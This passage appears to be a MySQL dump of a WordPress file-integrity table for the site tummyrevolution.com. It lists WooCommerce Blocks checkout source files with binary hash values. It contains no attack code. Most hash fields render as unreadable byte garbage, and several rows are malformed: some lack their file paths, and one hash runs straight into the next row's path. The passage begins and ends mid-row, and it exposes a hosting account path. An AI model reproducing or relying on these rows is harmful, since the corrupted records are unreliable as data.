H','RǑ0','',0,'?'),('K\\s6YN09`W@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',D\Z','waV;-HjnEc|$%U5w','',0,'?'),('\r\"8L#KWLo','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\09oqKa\0ވ','8&R?h:ooIxW\\Ah','',0,'?'),('ڍ# ]t=x|է','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±mUz`oS','S֝DȀ%f^H}lH\0M','',0,'?'),('\'jHUuH˛r\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|:ORڕ','| 1!rA?B\0 ONn_^','',0,'?'),('3@Rۈk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-express-payment-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M Y\00X','KLmWgO\0wgmƒ-K','',0,'?'),('t5nu= ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U)\'$ ]3AW@','W\\ ##y;Щm\n[d','',0,'?'),('OmG','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nhj','%(d*&%z8c׊2PKϨ','',0,'?'),('lLko_!cK+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƹ+GжML\nZ',';T>=K /8bTqPWš','',0,'?'),('\n9T׬H','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-fields-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j0|I~5zDG9QG','JD\na2a{','',0,'?'),('E[8\"\\E\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iZU<ˡBM','b΄LnWpɢZN','',0,'?'),('(پ|IF&f\'O晅','',0,'?'),('A^i֫7zћg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɨ%L2','%>\rߛCޕ~?$لA/\0b#','',0,'?'),('19W\0TĂL','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^leN','zQ0,7_n@(dso$','',0,'?'),('8ےc<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-note-block/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`&/̜j\Z\n*\Z','jv\'%5g|L=\"}5L9o+^فU','',0,'?'),('vlG)wzƵͪ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rif]','b}KS0_z+tm—|\\g','',0,'?'),('clcg>cz','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' F7Ԇ','l>ͳB˚J$\rpR`Cr- Uc\r|','',0,'?'),('Egp-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v/Lkc̗\0c+','2hEq\"l=pe~yڵM/+','',0,'?'),('S4*oG7eK\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yIy:()K{^','9A 2%ɖ:˺uKV','',0,'?'),('t.9ca}̀y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{V<9\ZjCϺ','[ǣk=.@^','',0,'?'),('SI`[`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/slotfills.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-block/slotfills.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'_1& ','bK@}͹UORt[9l','',0,'?'),('|C\Zc9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p?TFg?4-d','\n\reeD<0Je5L:`wĿB','',0,'?'),('͵*:<.&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),('0.,ϻdp','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('@ PTU\0>z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-cart-items/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';wxDuXp','Yp\0h*T/x*\"d','',0,'?'),('J Ԣx#fX\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!\n8o','zy-UH\\˄,9yÒBn','',0,'?'),('Iˠ*`Q<[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mP\"f{\0@{]','7Av=|XCCS[H','',0,'?'),('mN4w|hA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lje$/%7)','ٷWGX\n6*o>>PhliH','',0,'?'),(')ؒD`!UY/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('J-k^oVkR','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-coupon-form/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߓ沄MQ%R','|yKb>(Z}6 JDd/m','',0,'?'),('\ZyǬ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UԡK% \"','3}IE`,^(j%1H#','',0,'?'),('Y9KIh','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\ZrXbNMM5','dͭ }XTAy&)x%`ɮ8','',0,'?'),('= g{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),('@Dz4;dM','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('܋9IzKz9F','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-discount/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wvt#R)','u[AMZ}9`/Pc37|','',0,'?'),('BfItr`֗','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!+2TAd~I','0F+Gk;lFM/MWdZmC','',0,'?'),('3fS/~sO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}9Lkj$Xi ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ī[km8J(','lKьV4A{A^~2XE}','',0,'?'),('r\nL{]qE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('ܡ>)[9]k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-fee/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>N!H(\r т','fxo]GB`_2`HB.]! Z','',0,'?'),('.}fB7\rL.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q SO&Lt0','BMql(aK~[O_%`7eWA','',0,'?'),('^?m`,qF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"0UL ȲÙ','Niu\0mR>(M/K]\\ɷ{','',0,'?'),('\0dkKW!dT','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\noIpO5','Av<.\'vig`\n','',0,'?'),('ucDoD ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pvBO`9OgY','y^EIϽ.<6x2y-ϋ','',0,'?'),('@zJXn$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-shipping/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[VM+Qo?\\','7a}\'56NL','aں\nE Iе?TVZQ)','',0,'?'),('$1xۑ;9}k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HxI-','∊pvdbD5R}/rJ','',0,'?'),('@ؐ%u4 e','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^aux%=','g8mɎL:G \0k̞wWr^','',0,'?'),('Rp ݿ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ^9x N7l','yhB/~\\Ǒt:','',0,'?'),('C9˛T2FMj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-order-summary-taxes/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','76֚צ9!^','v#TЌhVV!!9ctfw\'׶xj','',0,'?'),('\r-LՕs̥SJe','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@667mդbL7','&%Ƨ}:TǠ]ɸJ','',0,'?'),('q<|W-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{`y&!>Y','):C\Zgj \\w@U@5V&','',0,'?'),('bGReA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʠP`=#:3','MB{}N׎\\5Vp2$$c ','',0,'?'),('t6=]c:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-payment-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:g,?^m','n#.BWbl Do}5cöA_','',0,'?'),(']Tc4JCGOX|Y. &( ','',0,'?'),('N?m\0PB','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+U\\$J̘e','y9.85Bt]zQl!!*\\ؙr','',0,'?'),('Ylq~]','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-pickup-options-block/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Oj@JV','\0N?O>4 BQ;aD','',0,'?'),('_+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q&n>.;','{9I1*1;ke}bQ','',0,'?'),('h/*$/oi3s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e,ew nD)C','>YЈQq@y)AE8k','',0,'?'),('LiZk=(I=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/block.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tu̿Pk','?(,psO~5AMy\0j\03OW*','',0,'?'),('U\nug:j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VVE[>h','|)l`Sn(RKaֽ\"7Xu','',0,'?'),('x]H','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':N\Z\"i@mX','3>?~^/giq:WeoA','',0,'?'),('\0Y\"V','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-address-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﮔUmӘ]','B8]+&@vQtuTn','',0,'?'),('Z>ܛQrZ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/attributes.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/attributes.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\\3ь\n1L','wG*OK/3Oq5','',0,'?'),(':Τ\0it','',0,'?'),('n̦=OL޳','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/edit.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/edit.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yO|=6%pq\\ ','ʾ.{\",GU--mf59@<','',0,'?'),('V(?h=X׍','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/frontend.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/frontend.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V4\0`bqk','0yn0[L\'yF]$\'ɚ','',0,'?'),('ٲdk\\ȟp(Di#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/index.tsx','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/checkout/inner-blocks/checkout-shipping-method-block/index.tsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m[uQ4!`pX4̿','\n@Чĥ9|hm+4','',0,'?'),('8p 